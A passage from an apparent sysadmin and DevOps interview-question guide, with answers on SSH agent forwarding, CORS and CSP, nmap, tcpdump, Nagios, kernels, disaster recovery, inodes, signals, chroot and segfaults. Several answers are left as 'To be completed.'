IdentityFile ~/.ssh/id_rsa.git.example.com
ForwardAgent yes
```

Your remote server must allow SSH agent forwarding on inbound connections and your local `ssh-agent` must be running.

Forwarding an ssh agent carries its own security risk. If someone on the remote machine can gain access to your forwarded ssh agent connection, they can still make use of your keys. However, this is better than storing keys on remote machines: the attacker can only use the ssh agent connection, not the key itself. Thus, they can only do anything while you're logged into the remote machine. If you store the key on the remote machine, they can make a copy of it and use it whenever they want.

If you use ssh keys, remember about passphrases, which are strongly recommended to reduce the risk of keys accidentally leaking.

Useful resources:

- [How to forward local keypair in a SSH session?](https://stackoverflow.com/questions/12257968/how-to-forward-local-keypair-in-a-ssh-session)
- [Using SSH agent forwarding](https://developer.github.com/v3/guides/using-ssh-agent-forwarding/)
- [SSH Agent Forwarding considered harmful](https://heipei.github.io/2015/02/26/SSH-Agent-Forwarding-considered-harmful/)
- [Security Consideration while using ssh-agent](https://www.commandprompt.com/blog/security_considerations_while_using_ssh-agent/)

</details>

<details>
<summary><b>What is the difference between CORS and CSPs?</b></summary><br>

**CORS** allows the **Same Origin Policy** to be relaxed for a domain. e.g.
normally if the user logs into both `example.com` and `example.org`, the Same Origin Policy prevents `example.com` from making an AJAX request to `example.org/current_user/full_user_details` and gaining access to the response. This is the default policy of the web and prevents the user's data from being leaked when logged into multiple sites at the same time.

Now with **CORS**, `example.org` could set a policy to say it will allow the origin `https://example.com` to read responses made by AJAX. This would be done if both `example.com` and `example.org` are run by the same company and data sharing between the origins is to be allowed in the user's browser. It only affects the client-side of things, not the server-side.

**CSPs** on the other hand set a policy of what content can run on the current site. For example, whether JavaScript can be executed inline, or which domains `.js` files can be loaded from. This can act as another line of defense against **XSS** attacks, where the attacker will try to inject script into the HTML page. Normally output would be encoded; however, say the developer had forgotten to encode just one output field. Because the policy prevents in-line script from executing, the attack is thwarted.

Useful resources:

- [What is the difference between CORS and CSPs? (original)](https://stackoverflow.com/questions/39488241/what-is-the-difference-between-cors-and-csps)
- [CSP, SRI and CORS](https://colorblindprogramming.com/csp-sri-and-cors)

</details>

<details>
<summary><b>Explain four types of responses from firewall when scanning with <code>nmap</code>.</b></summary><br>

There might be four types of responses:

- **Open port** - few ports in the case of the firewall
- **Closed port** - most ports are closed because of the firewall
- **Filtered** - `nmap` is not sure whether the port is open or not
- **Unfiltered** - `nmap` can access the port but is still confused about the open status of the port

Useful resources:

- [NMAP - Closed vs Filtered](https://security.stackexchange.com/questions/182504/nmap-closed-vs-filtered)

</details>

<details>
<summary><b>What does a <code>tcpdump</code> do? How to capture only incoming traffic to your interface?</b></summary><br>

`tcpdump` is one of the most powerful and widely used command-line packet sniffers/analyzers. It is used to capture or filter TCP/IP packets that are received or transferred over a network on a specific interface. `tcpdump` puts your network card into promiscuous mode, which basically tells it to accept every packet it receives. It allows the user to see all traffic being passed over the network. (Wireshark uses pcap to capture packets in the same way.)

If you want to view only packets that come to your interface you should use:

- `-Q in` - for the Linux `tcpdump` version
- `-D in` - for the BSD `tcpdump` version

Both params set the send/receive direction for which packets should be captured.

```bash
tcpdump -nei eth0 -Q in host 192.168.252.125 and port 8080
```

</details>

###### Devops Questions (7)

<details>
<summary><b>Which are the top DevOps tools?
Which tools have you worked on?</b></summary><br>

The most popular DevOps tools are mentioned below:

- **Git** : Version Control System tool
- **Jenkins** : Continuous Integration tool
- **Selenium** : Continuous Testing tool
- **Puppet**, **Chef**, **Ansible** : Configuration Management and Deployment tools
- **Nagios** : Continuous Monitoring tool
- **Docker** : Containerization tool

</details>

<details>
<summary><b>How do all these tools work together?</b></summary><br>

A generic logical flow of how these tools work together:

- Developers develop the code and this source code is managed by a Version Control System tool like Git
- Developers send this code to the Git repository and any changes made in the code are committed to this repository
- Jenkins pulls this code from the repository using the Git plugin and builds it using tools like Ant or Maven
- Configuration management tools like Puppet deploy & provision the testing environment, and then Jenkins releases this code to the test environment, where testing is done using tools like Selenium
- Once the code is tested, Jenkins sends it for deployment to the production server (the production server, too, is provisioned & maintained by tools like Puppet)
- After deployment, it is continuously monitored by tools like Nagios
- Docker containers provide a testing environment to test the build's features

</details>

<details>
<summary><b>What are playbooks in Ansible?</b></summary><br>

Playbooks are Ansible's configuration, deployment, and orchestration language. They can describe a policy you want your remote systems to enforce, or a set of steps in a general IT process. Playbooks are designed to be human-readable and are developed in a basic text language. At a basic level, playbooks can be used to manage configurations of and deployments to remote machines.

</details>

<details>
<summary><b>What is NRPE (Nagios Remote Plugin Executor) in Nagios?</b></summary><br>

The **NRPE** addon is designed to allow you to execute Nagios plugins on remote Linux/Unix machines. The main reason for doing this is to allow Nagios to monitor "local" resources (like CPU load, memory usage, etc.) on remote machines. Since these local resources are not usually exposed to external machines, an agent like **NRPE** must be installed on the remote Linux/Unix machines.

</details>

<details>
<summary><b>What is the difference between Active and Passive check in Nagios?</b></summary><br>

The major difference between Active and Passive checks is that Active checks are initiated and performed by Nagios, while passive checks are performed by external applications.

Passive checks are useful for monitoring services that are:

- asynchronous in nature and cannot be monitored effectively by polling their status on a regularly scheduled basis.
- located behind a firewall and cannot be checked actively from the monitoring host.

The main features of Active checks are as follows:

- active checks are initiated by the Nagios process.
- active checks are run on a regularly scheduled basis.

</details>

<details>
<summary><b>How to <code>git clone</code> including submodules?</b></summary><br>

For example:

```bash
# With -j8 - performance optimization
git clone --recurse-submodules -j8 git://github.com/foo/bar.git

# For already cloned repos or older Git versions
git clone git://github.com/foo/bar.git
cd bar
git submodule update --init --recursive
```

</details>

<details>
<summary><b>Mention what are the advantages of using Redis? What is <code>redis-cli</code>?
</b></summary><br>

- it provides high speed (exceptionally faster than others)
- it supports server-side locking
- it has lots of client libraries
- it has command-level atomic operations (tx operation)
- it supports rich data types like hashes, sets, and bitmaps

`redis-cli` is the **Redis** command line interface, a simple program that allows you to send commands to **Redis**, and read the replies sent by the server, directly from the terminal.

Useful resources:

- [10 Advantages of Redis](https://dzone.com/articles/10-traits-of-redis)

</details>

###### Cyber Security Questions (4)

<details>
<summary><b>What is XSS, how will you mitigate it?</b></summary><br>

**Cross Site Scripting** is a JavaScript vulnerability in web applications. The easiest way to explain this is a case when a user enters a script in the client-side input fields and that input gets processed without being validated. This leads to untrusted data getting saved and executed on the client side.

Countermeasures against XSS include input validation, implementing a CSP (Content Security Policy), and others.

</details>

<details>
<summary><b>HIDS vs NIDS and which one is better and why?</b></summary><br>

**HIDS** is a host intrusion detection system and **NIDS** is a network intrusion detection system. Both systems work along similar lines; it's just that the placement is different. **HIDS** is placed on each host whereas **NIDS** is placed in the network. For an enterprise, **NIDS** is preferred as **HIDS** is difficult to manage, plus it consumes processing power of the host as well.

</details>

<details>
<summary><b>What is compliance?</b></summary><br>

Abiding by a set of standards set by a government/independent party/organisation, e.g. an industry which stores, processes or transmits payment-related information needs to comply with PCI DSS (Payment Card Industry Data Security Standard). Other compliance examples can be an organisation complying with its own policies.

</details>

<details>
<summary><b>What is a WAF and what are its types?</b></summary><br>

**WAF** stands for web application firewall. It is used to protect the application by filtering legitimate traffic from malicious traffic. A **WAF** can be either box type or cloud based.

</details>

### :diamond_shape_with_a_dot_inside: <a name="senior-sysadmin">Senior Sysadmin</a>

###### System Questions (61)

<details>
<summary><b>Explain the current architecture you're responsible for and point out where it's scalable or fault-tolerant. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>Tell me how code gets deployed in your current production. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>What are the different types of kernels? Explain.</b></summary><br>

**Monolithic Kernels**

Earlier, in this type of kernel architecture, all the basic system services like process and memory management, interrupt handling etc. were packaged into a single module in kernel space. This type of architecture led to some serious drawbacks like:

- the size of the kernel, which was huge
- poor maintainability, which means bug fixing or addition of new features resulted in recompilation of the whole kernel, which could take hours

In a modern-day approach to monolithic architecture, the kernel consists of different modules which can be dynamically loaded and unloaded. This modular approach allows easy extension of the OS's capabilities.
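For instance, on a running Linux system you can list, load and unload modules without recompiling or rebooting (the `loop` module is just an example):

```bash
lsmod | head              # list modules currently loaded into the kernel
sudo modprobe loop        # dynamically load the loop block-device module
sudo modprobe -r loop     # unload it again - no recompilation required
```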
With this approach, maintainability of the kernel became very easy, as only the concerned module needs to be loaded and unloaded every time there is a change or bug fix in a particular module. Linux follows the monolithic modular approach.

**Microkernels**

This architecture mainly addresses the problem of the ever-growing size of kernel code which could not be controlled in the monolithic approach. This architecture allows some basic services like device driver management, protocol stack, file system etc. to run in user space.

In this architecture, all the basic OS services which are made part of user space run as servers which are used by other programs in the system through inter-process communication (IPC). Example: we have servers for device drivers, network protocol stacks, file systems, graphics, etc. Microkernel servers are essentially daemon programs like any others, except that the kernel grants some of them privileges to interact with parts of physical memory that are otherwise off limits to most programs.

**Hybrid Kernels (Modular Kernels)**

This is a combination of the above two, where the key idea is that Operating System services are in kernel space, so there is no message passing and no performance overhead of having services in user space - but also none of the reliability benefits. This is used by Microsoft's NT kernels, all the way up to the latest Windows version.

Useful resources:

- [An Introduction to Kernels. The Heart of Computing Devices. (original)](https://keetmalin.wixsite.com/keetmalin/single-post/2017/08/24/An-Introduction-to-Kernels-The-Heart-of-Computing-Devices)

</details>

<details>
<summary><b>The program returns the error of a missing library. How to provide dynamically linkable libraries?</b></summary><br>

The environment variable `LD_LIBRARY_PATH` is a colon-separated set of directories where libraries should be searched for first, before the standard set of directories; this is useful when debugging a new library or using a nonstandard library for special purposes.

The best way to use `LD_LIBRARY_PATH` is to set it on the command line or in a script immediately before executing the program. This way the new `LD_LIBRARY_PATH` is isolated from the rest of your system.

Example of use:

```bash
export LD_LIBRARY_PATH="/list/of/library/paths:/another/path"
./program
```

Useful resources:

- [How to correctly use LD_LIBRARY_PATH](http://wiredrevolution.com/system-administration/how-to-correctly-use-ld_library_path)

</details>

<details>
<summary><b>Write the most important rules for using root privileges safely for novice administrators. ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>What is the advantage of synchronizing UID/GID across multiple systems?</b></summary><br>

There are several principal reasons why you want to co-ordinate the **user/UID** and **group/GID** management across your network.

The first is relatively obvious - it has to do with user and administrative convenience. If each of your users is expected to have relatively uniform access to the systems throughout the network, then they'll expect the same username and password to work on each system that they are supposed to use. If they change their password, they will expect that change to be global.

It also has a relationship with user names and group names in Unix and Linux. They are mapped into numeric forms (**UID's** and **GID's** respectively). All file ownership (inodes) and processes use these numerics for all access and identity determination throughout the kernel and drivers.
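You can observe both representations directly; a small sketch (the paths and UID 1000 are examples):

```bash
ls -l /etc/passwd      # ownership shown as names (root root)
ls -n /etc/passwd      # the same inode data as raw numerics (0 0)
id -u root             # map a name to its UID: prints 0
getent passwd 1000     # map a UID back to a name, if that account exists
```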
These numeric values are reverse mapped back to their corresponding principal symbolic representations (the names) by the utilities that display or process that information.

It is also recommended that you adopt a policy that **UID's** are not re-used. When a user leaves your organization you "retire" their **UID** (disabling their access by \*'ing out their passwd, removing them from the groups maps, setting their "shell" to some `/bin/denied` binary and their home directory to a secured _graveyard_ - I use `/home/.graveyard` on my systems).

The reason for this may not be obvious. However, if you are maintaining archival backups for several years (or indefinitely) you'll want to avoid any ambiguities and confusion that might result from restoring one (long gone) user's files and finding them owned by one of your new users.

Useful resources:

- [UID/GID Synchronization and Management (original)](https://linuxgazette.net/issue31/tag_uidgid.html)
- [What's the advantage of synchronizing UID/GID across Linux machines?](https://serverfault.com/questions/603987/whats-the-advantage-of-synchronizing-uid-gid-across-linux-machines)
- [How can I keep user accounts consistent across multiple machines?](https://unix.stackexchange.com/questions/141023/how-can-i-keep-user-acccounts-consistent-accross-multiple-machines)

</details>

<details>
<summary><b>What principles should you follow for successful system performance tuning? ***</b></summary><br>

To be completed.

Useful resources:

- [An Introduction to Performance Tuning](https://www.oreilly.com/library/view/system-performance-tuning/059600284X/ch01.html)

</details>

<details>
<summary><b>Describe start-up configuration files and directory in BSD systems.</b></summary><br>

In BSD the primary start-up configuration file is `/etc/defaults/rc.conf`. System startup scripts such as `/etc/rc` and `/etc/rc.d` just include this file. If you want to add other programs to system startup you need to change the `/etc/rc.conf` file instead of `/etc/defaults/rc.conf`.

</details>

<details>
<summary><b>The CPU spends most of its time waiting for IO operations to complete. Which tools do you use to diagnose which process(es) are waiting for IO? How to minimize IO wait time? ***</b></summary><br>

To be completed.

Useful resources:

- [Can anyone explain precisely what IOWait is?](https://serverfault.com/questions/12679/can-anyone-explain-precisely-what-iowait-is)

</details>

<details>
<summary><b>The Junior dev accidentally destroyed the production database. How can you prevent such situations?</b></summary><br>

**Create a disaster recovery plan**

Disaster recovery and business continuity planning are integral parts of the overall risk management for an organization. A disaster recovery plan is a documented process or set of procedures to recover and protect a business IT infrastructure. If you don't have a recovery solution, then your restoration efforts will become rebuilding efforts, starting from scratch to recreate whatever was lost. You should use commonly occurring real-life data disaster scenarios to simulate what your backups will and won't do in a crisis.

**Create a disaster recovery center**

In the event of unplanned interruptions in the functioning of the primary location, service and all operational activities are switched to the backup center, so the unavailability of services is limited to the absolute minimum. Does the facility have sufficient bandwidth options and power to scale and deal with the increased load during a major disaster?
Are resources available to periodically test failover?

**Create regular backups and test them!**

Backups are a way to protect the investment in data. By having several copies of the data, it does not matter as much if one is destroyed (the cost is only that of the restoration of the lost data from the backup). When you lose data, one thing is certain: downtime.

To assure the validity and integrity of any backup, it's essential to carry out regular restoration tests. Ideally, a test should be conducted after every backup completes to ensure data can be successfully secured and recovered. However, this often isn't practical due to a lack of available resources or time constraints. Make backups of entire virtual machines as well as the important components inside them.

**Create snapshots: VM, disk or LVM**

Snapshots are perfect if you want to recover a server from a previous state, but they are only a "quick method" - they cannot restore the system after too many items have changed. Always create them before making changes on production environments (and not only there).

Disk snapshots are used to generate a snapshot of an entire disk. These snapshots don't make it easy to restore individual chunks of data (e.g. a lost user account), though it's possible. The primary purpose is to restore entire disks in case of disk failure. LVM snapshots can be primarily used to easily copy data from the production environment to the staging environment. Remember: snapshots are not backups!

**Development and testing environments**

A production environment is the real instance of the application and its database used by the company or the clients. The production database has all the real data. Never set up development environments based directly on the production database; use a backup for this instead.

Keep dev and test environments that your engineers can get to, and a prod environment that only a few people can push updates to, following an approved change. All environments such as prod, dev and test should have one major difference: authorization data for services. For example, the postgres database instance in the testing environment should be consistent (if possible) with the production database; however, in order to eliminate mistakes, database names as well as logins and passwords for authorization should be different.

**Single point of failure**

The general method to avoid single points of failure is to provide redundant components for each necessary resource, so service can continue if a component fails.

**Synchronization and replication process for databases**

The replication procedure is fragile and prone to error. A slightly longer delay of data replication (e.g. for the DRC) is also a good idea: with near-real-time replicas, data changes will usually be replicated within minutes, so once an accidental deletion happens, the lost data won't be on the replica database either.

**Create a database model with users, roles and rights; use different methods of protection**

Only very advanced devs should have permissions for db admin access. The others really don't need write access to clone a database - and just don't give a developer write access to prod. The production database should refuse connections from any server and PC which isn't the one running the production application, even if it provides a valid username/password. Why should development machines be able to access a production database at all? A simple firewall rule letting only the servers that need the DB data access the database goes a long way.
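As a hedged sketch of such a rule (the application server IP `10.0.0.21` and the PostgreSQL port are assumptions for illustration):

```bash
# On the database host: allow only the production app server to reach
# PostgreSQL, and drop everyone else - including developer workstations.
iptables -A INPUT -p tcp -s 10.0.0.21 --dport 5432 -j ACCEPT
iptables -A INPUT -p tcp --dport 5432 -j DROP
```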
**Create summary/postmortem documents after failures**

The post-mortem audience includes customers, direct reports, peers, the company's executive team and often investors. Explain what caused the outage on a timeline. Every incident begins with a specific trigger at a specific time, which often causes some unexpected behavior. For example, our servers were rebooted and we expected them to come back up intact, which didn't happen. Furthermore, every incident has a root cause: the reboot itself was the trigger; however, a bug in the driver caused the actual outage. Finally, there are consequences to every incident; the most obvious one is that the site goes down. The post-mortem answers the single most important question of what could have prevented the outage.

Despite how painful an outage may have been, the worst thing you can do is to bury it and never properly close the incident in a clear and transparent way.

**If you also made a big mistake...**

> "*Humans are just apes with bigger computers.*" - african_cheetah (Reddit)
>
> "*I've come to appreciate not having access to things I don't absolutely need.*" - warm_vanilla_sugar (Reddit)
>
> Document whatever happened somewhere. Write setup guides. Failure is instructive.

Useful resources:

- [Accidentally destroyed production database on first day of a job...](https://www.reddit.com/r/cscareerquestions/comments/6ez8ag/accidentally_destroyed_production_database_on/)
- [Postmortem of database outage of January 31](https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/)
- [How to write an Incident Report/Postmortem](https://sysadmincasts.com/episodes/20-how-to-write-an-incident-report-postmortem)

</details>

<details>
<summary><b>How to add a new disk in a Linux server without rebooting? How to rescan and add it in LVM?</b></summary><br>

To be completed.

Useful resources:

- [How to Add New Disk in Linux CentOS 7 Without Rebooting](https://linoxide.com/linux-how-to/add-new-disk-centos-7-without-rebooting/)

</details>

<details>
<summary><b>Explain the system calls used for process management in Linux.</b></summary><br>

There are several system calls for process management. These are as follows:

- `fork()`: it is used to create a new process
- `exec()`: it is used to execute a new program
- `wait()`: it is used to make the process wait
- `exit()`: it is used to exit or terminate the process
- `getpid()`: it is used to find the unique process ID
- `getppid()`: it is used to check the parent process ID
- `nice()`: it is used to bias the priority of the currently running process

Useful resources:

- [System Calls](http://faculty.salina.k-state.edu/tim/ossg/Introduction/sys_calls.html)

</details>

<details>
<summary><b>Can't mount the root file system. Why? ***</b></summary><br>

To be completed.

Useful resources:

- [What does "mounting a root file system" mean exactly?](https://superuser.com/questions/193918/what-does-mounting-a-root-file-system-mean-exactly)
- [How does a kernel mount the root partition?](https://unix.stackexchange.com/questions/9944/how-does-a-kernel-mount-the-root-partition)

</details>

<details>
<summary><b>You have to delete a 100GB file. Which method will be the most optimal? ***</b></summary><br>

To be completed.
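While the answer above is left open, one commonly suggested low-impact approach is sketched below; the file path and step sizes are examples, and `ionice` only has an effect with schedulers that honor I/O priorities (e.g. CFQ/BFQ):

```bash
# Delete with idle I/O priority so other workloads are not starved:
ionice -c 3 rm /path/to/bigfile

# Alternatively, shrink the file in steps with truncate so the filesystem
# frees extents gradually instead of all at once:
for size in 80G 60G 40G 20G 0; do
  truncate -s "$size" /path/to/bigfile
  sleep 2
done
rm /path/to/bigfile
```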
Useful resources:

- [Is there a way to delete 100GB file on Linux without thrashing IO/load?](https://serverfault.com/questions/336917/is-there-a-way-to-delete-100gb-file-on-linux-without-thrashing-io-load)
- [rm on a directory with millions of files](https://serverfault.com/questions/183821/rm-on-a-directory-with-millions-of-files)

</details>

<details>
<summary><b>Explain interrupts and interrupt handlers in Linux.</b></summary><br>

Here's a high-level view of the low-level processing. I'm describing a simple typical architecture; real architectures can be more complex or differ in ways that don't matter at this level of detail.

When an **interrupt** occurs, the processor checks whether interrupts are masked. If they are, nothing happens until they are unmasked. When interrupts become unmasked, if there are any pending interrupts, the processor picks one.

Then the processor executes the interrupt by branching to a particular address in memory. The code at that address is called the **interrupt handler**. When the processor branches there, it masks interrupts (so the interrupt handler has exclusive control) and saves the contents of some registers in some place (typically other registers).

The interrupt handler does what it must do, typically by communicating with the peripheral that triggered the interrupt to send or receive data. If the interrupt was raised by the timer, the handler might trigger the OS scheduler, to switch to a different thread. When the handler finishes executing, it executes a special return-from-interrupt instruction that restores the saved registers and unmasks interrupts.

The interrupt handler must run quickly, because it's preventing any other interrupt from running. In the Linux kernel, interrupt processing is divided in two parts:

- The "top half" is the interrupt handler. It does the minimum necessary, typically communicate with the hardware and set a flag somewhere in kernel memory.
- The "bottom half" does any other necessary processing, for example copying data into process memory, updating kernel data structures, etc. It can take its time and even block waiting for some other part of the system since it runs with interrupts enabled.

Useful resources:

- [How is an Interrupt handled in Linux? (original)](https://unix.stackexchange.com/questions/5788/how-is-an-interrupt-handled-in-linux)
- [Interrupts and Interrupt Handlers](https://notes.shichao.io/lkd/ch7/)

</details>

<details>
<summary><b>What considerations come into play when designing a highly available application, both at the architecture level and the application level? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>What fields are stored in an inode?</b></summary><br>

Within a POSIX system, a file has the following attributes which may be retrieved by the stat system call:

- The **device ID** (this identifies the device containing the file; that is, the scope of uniqueness of the file serial number)
- The **file serial number** (inode number)
- The **file mode**, which determines the file type and how the file's owner, its group, and others can access the file
- A **link count** telling how many hard links point to the inode
- The **User ID** of the file's owner
- The **Group ID** of the file
- The **device ID** of the file if it is a device file.
- The **size of the file** in bytes
- **Timestamps** telling when the inode itself was last modified (ctime, inode change time), the file content last modified (mtime, modification time), and last accessed (atime, access time)
- The preferred **I/O block size**
- The **number of blocks** allocated to this file

Useful resources:

- [Inodes - an Introduction](http://www.grymoire.com/Unix/Inodes.html)

</details>

<details>
<summary><b>Ordinary users are able to read <code>/etc/passwd</code>. Is it a security hole? Do you know of any other password shadowing schemes?</b></summary><br>

Typically, the _hashed passwords_ are stored in `/etc/shadow` on most Linux systems:

```bash
-rw-r----- 1 root shadow 1349 2016-07-03 03:54 /etc/shadow
```

They are stored in `/etc/master.passwd` on BSD systems.

Programs that need to perform authentication still need to run with `root` privileges:

```bash
-rwsr-xr-x 1 root root 42792 2016-02-14 14:13 /usr/bin/passwd
```

If you dislike the `setuid root` programs and one single file containing all the hashed passwords on your system, you can replace it with the **Openwall TCB PAM module**. This provides every single user with their own file for storing their hashed password - as a result the number of `setuid root` programs on the system can be drastically reduced.

Useful resources:

- [Ordinary users are able to read /etc/passwd, is this a security hole? (original)](https://serverfault.com/questions/286654/ordinary-users-are-able-to-read-etc-passwd-is-this-a-security-hole/286657#286657)
- [tcb - the alternative to /etc/shadow](https://www.openwall.com/tcb/)
- [Why shadow your passwd file?](https://www.tldp.org/HOWTO/Shadow-Password-HOWTO-2.html)

</details>

<details>
<summary><b>What are some of the benefits of using systemd over SysV init? ***</b></summary><br>

To be completed.

</details>

<details>
<summary><b>How do you run a command every time a file is modified?</b></summary><br>

For example:

```bash
while inotifywait -e close_write filename ; do
  echo "changed" >> /var/log/changed
done
```

</details>

<details>
<summary><b>You need to copy a large amount of data. Explain the most effective way. ***</b></summary><br>

To be completed.

Useful resources:

- [Copying a large directory tree locally? cp or rsync?](https://serverfault.com/questions/43014/copying-a-large-directory-tree-locally-cp-or-rsync)

</details>

<details>
<summary><b>Tell me about the dangers and caveats of LVM.</b></summary><br>

**Risks of using LVM**

- Vulnerable to write caching issues with SSD or VM hypervisor
- Harder to recover data due to more complex on-disk structures
- Harder to resize filesystems correctly
- Snapshots are hard to use, slow and buggy
- Requires some skill to configure correctly given these issues

Useful resources:

- [LVM dangers and caveats (original)](https://serverfault.com/questions/279571/lvm-dangers-and-caveats)

</details>

<details>
<summary><b>The Python dev team in your company has a dilemma about what to choose: uwsgi or gunicorn. What are the pros/cons of each of the solutions from the admin's perspective? ***</b></summary><br>

To be completed.

Useful resources:

- [uWSGI vs. Gunicorn, or How to Make Python Go Faster than Node](https://blog.kgriffs.com/2012/12/18/uwsgi-vs-gunicorn-vs-node-benchmarks.html)

</details>

<details>
<summary><b>What if <code>kill -9</code> does not work? Describe exceptions for which the use of SIGKILL is insufficient.</b></summary><br>

`kill -9` (`SIGKILL`) always works, provided you have the permission to kill the process.
Basically, either the process must be started by you and not be setuid or setgid, or you must be root. There is one exception: even root cannot send a fatal signal to PID 1 (the init process).

However, `kill -9` is not guaranteed to work immediately. All signals, including `SIGKILL`, are delivered asynchronously: the kernel may take its time to deliver them. Usually, delivering a signal takes at most a few microseconds, just the time it takes for the target to get a time slice. However, if the target has blocked the signal, the signal will be queued until the target unblocks it.

Normally, processes cannot block `SIGKILL`. But kernel code can, and processes execute kernel code when they call system calls. A process blocked in a system call is in uninterruptible sleep. The `ps` or `top` command will (on most unices) show it in state **D**.

Since a **D**-state process is uninterruptible, only a machine reboot can remove it in case it's not automatically handled by the system. Usually there is very little chance that a process stays in the **D** state for long; if it does, something is not being handled properly in the system, which can also indicate a bug.

A classical case of long uninterruptible sleep is processes accessing files over NFS when the server is not responding; modern implementations tend not to impose uninterruptible sleep (e.g. under Linux, the intr mount option allows a signal to interrupt NFS file accesses).

You may sometimes see entries marked **Z** (or **H** under Linux) in the `ps` or `top` output. These are technically not processes, they are zombie processes, which are nothing more than an entry in the process table, kept around so that the parent process can be notified of the death of its child. They will go away when the parent process pays attention (or dies).

In summary, the exceptions are:

- Zombie processes cannot be killed since they are already dead and waiting for their parent processes to reap them
- Processes that are in the blocked state will not die until they wake up again
- The init process is special: it does not get signals that it does not want to handle, and thus it can ignore **SIGKILL**. An exception from this exception is while init is ptraced on Linux
- An uninterruptibly sleeping process may not terminate (and free its resources) even when sent **SIGKILL**. This is one of the few cases in which a Unix system may have to be rebooted to solve a temporary software problem

Useful resources:

- [What if kill -9 does not work? (original)](https://unix.stackexchange.com/questions/5642/what-if-kill-9-does-not-work)
- [How to kill a process in Linux if kill -9 has no effect](https://serverfault.com/questions/458261/how-to-kill-a-process-in-linux-if-kill-9-has-no-effect)
- [When should I not kill -9 a process?](https://unix.stackexchange.com/questions/8916/when-should-i-not-kill-9-a-process)
- [SIGTERM vs. SIGKILL](https://major.io/2010/03/18/sigterm-vs-sigkill/)

</details>

<details>
<summary><b>Difference between <code>nohup</code>, <code>disown</code>, and <code>&</code>. What happens when using all together?</b></summary><br>

- `&` puts the job in the background, that is, makes it block on attempting to read input, and makes the shell not wait for its completion
- `disown` removes the process from the shell's job control, but it still leaves it connected to the terminal. One of the results is that the shell won't send it a **SIGHUP**.
Obviously, it can only be applied to background jobs, because you cannot enter it when a foreground job is running

- `nohup` disconnects the process from the terminal, redirects its output to `nohup.out` and shields it from **SIGHUP**. One of the effects (the naming one) is that the process won't receive any sent **SIGHUP**. It is completely independent from job control and could in principle be used also for foreground jobs (although that's not very useful)

If you use all three together, the process is running in the background, is removed from the shell's job control and is effectively disconnected from the terminal.

Useful resources:

- [Difference between nohup, disown and & (original)](https://unix.stackexchange.com/questions/3886/difference-between-nohup-disown-and)

</details>

<details>
<summary><b>What is the main advantage of using <code>chroot</code>? When and why do we use it? What is the purpose of the mount dev, proc, sys in a chroot environment?</b></summary><br>

An advantage of having a chroot environment is that the file-system is totally isolated from the physical host. `chroot` creates a separate file-system inside the file-system; the difference is that it uses a newly created root (/) as its root directory.

A chroot jail is a way to isolate a process and its children from the rest of the system. It should only be used for processes that don't run as root, as root users can break out of the jail very easily.

The idea is that you create a directory tree where you copy or link in all the system files needed for a process to run. You then use the `chroot()` system call to change the root directory to be at the base of this new tree and start the process running in that chroot'd environment. Since it can't actually reference paths outside the modified root, it can't perform operations (read/write etc.) maliciously on those locations.

On Linux, using bind mounts is a great way to populate the chroot tree. Using that, you can pull in folders like `/lib` and `/usr/lib` while not pulling in `/usr`, for example. Just bind the directory trees you want to directories you create in the jail directory.

A chroot environment is useful for:

- reinstalling a bootloader
- resetting a forgotten password
- performing a kernel upgrade (or downgrade)
- rebuilding your initial ramdisk
- fixing your **/etc/fstab**
- reinstalling packages using your package manager
- whatever

When working in a chrooted environment, there are a few special file systems that need to be mounted so all programs behave properly. The limitation is that `/dev`, `/sys` and `/proc` are not mounted by default, but they are needed for many tasks.

Useful resources:

- [Its all about Chroot](https://medium.com/@itseranga/chroot-316dc3c89584)
- [Best Practices for UNIX chroot() Operations](http://www.unixwiz.net/techtips/chroot-practices.html)
- [Is there an easier way to chroot than bind-mounting?](https://askubuntu.com/questions/32418/is-there-an-easier-way-to-chroot-than-bind-mounting)
- [What's the proper way to prepare chroot to recover a broken Linux installation?](https://superuser.com/questions/111152/whats-the-proper-way-to-prepare-chroot-to-recover-a-broken-linux-installation)

</details>

<details>
<summary><b>What are segmentation faults (segfaults), and how can you identify what's causing them?</b></summary><br>

A **segmentation fault** (aka _segfault_) is a common condition that causes programs to crash. Segfaults are caused by a program trying to read or write an illegal memory location.
Program memory is divided into different segments:

- a text segment for program instructions
- a data segment for variables and arrays defined at compile time
- a stack segment for temporary (or automatic) variables defined in subroutines and functions
- a heap segment for variables allocated during runtime by functions, such as `malloc` (in C)

In practice, segfaults are almost always due to trying to read or write a non-existent array element, not properly defining a pointer before using it, or (in C programs) accidentally using a variable's value as an address.

Each process also runs in its own virtual address space, which the kernel maps onto physical memory. Thus, when Process A reads memory location 0x877, it reads information residing at a different physical location in RAM than when Process B reads its own 0x877. All modern operating systems support and use segmentation, and so all can produce a segmentation fault.

A segmentation fault can also occur under the following circumstances:

- a buggy program/command, which can only be fixed by applying a patch
- it can also appear when you try to access an array beyond its end in a C program
- inside a chrooted jail this can occur when a critical shared lib, config file or `/dev/` entry is missing
- sometimes hardware, faulty memory or a faulty driver can also create problems
- an unsuitable operating environment (overheating can also generate this problem)

To debug this kind of error try one or all of the following techniques:

- enable core files: `$ ulimit -c unlimited`
- reproduce the crash: `$ ./<program>`
- debug the crash with gdb: `$ gdb <program> [core file]`
- or run `LD_PRELOAD=...path-to.../libSegFault.so <program>` to get a report with backtrace, loaded libs, etc

Also:

- make sure the correct hardware is installed and configured
- always apply all patches and use an updated system
- make sure all dependencies are installed inside the jail
- turn on core dumping for supported services such as Apache
- use `strace`, which is a useful diagnostic, instructional, and debugging tool

Sometimes segmentation faults are not caused by bugs in the program but are caused instead by system memory limits being set too low. Usually it is the limit on stack size that causes this kind of problem (stack overflows). To check memory limits, use the `ulimit` command in bash.

Useful resources:

- [What are segmentation faults (segfaults), and how can I identify what's causing them? (original)](https://kb.iu.edu/d/aqsj)
- [What is a segmentation fault on Linux?](https://stackoverflow.com/questions/3200526/what-is-a-segmentation-fault-on-linux)
- [Segmentation fault when calling a recursive bash function](https://unix.stackexchange.com/questions/296641/segmentation-fault-when-calling-a-recursive-bash-function)
- [Troubleshooting Segmentation Violations/Faults](http://web.mit.edu/10.001/Web/Tips/tips_on_segmentation.html)
- [Can one use libSegFault.so to get backtraces for SIGABRT?](https://stackoverflow.com/questions/18706496/can-one-use-libsegfault-so-to-get-backtraces-for-sigabrt)

</details>

<details>
<summary><b>One of the processes runs slowly. How do you check how long it has been running, and which tools will you use?</b></summary><br>

To be completed.
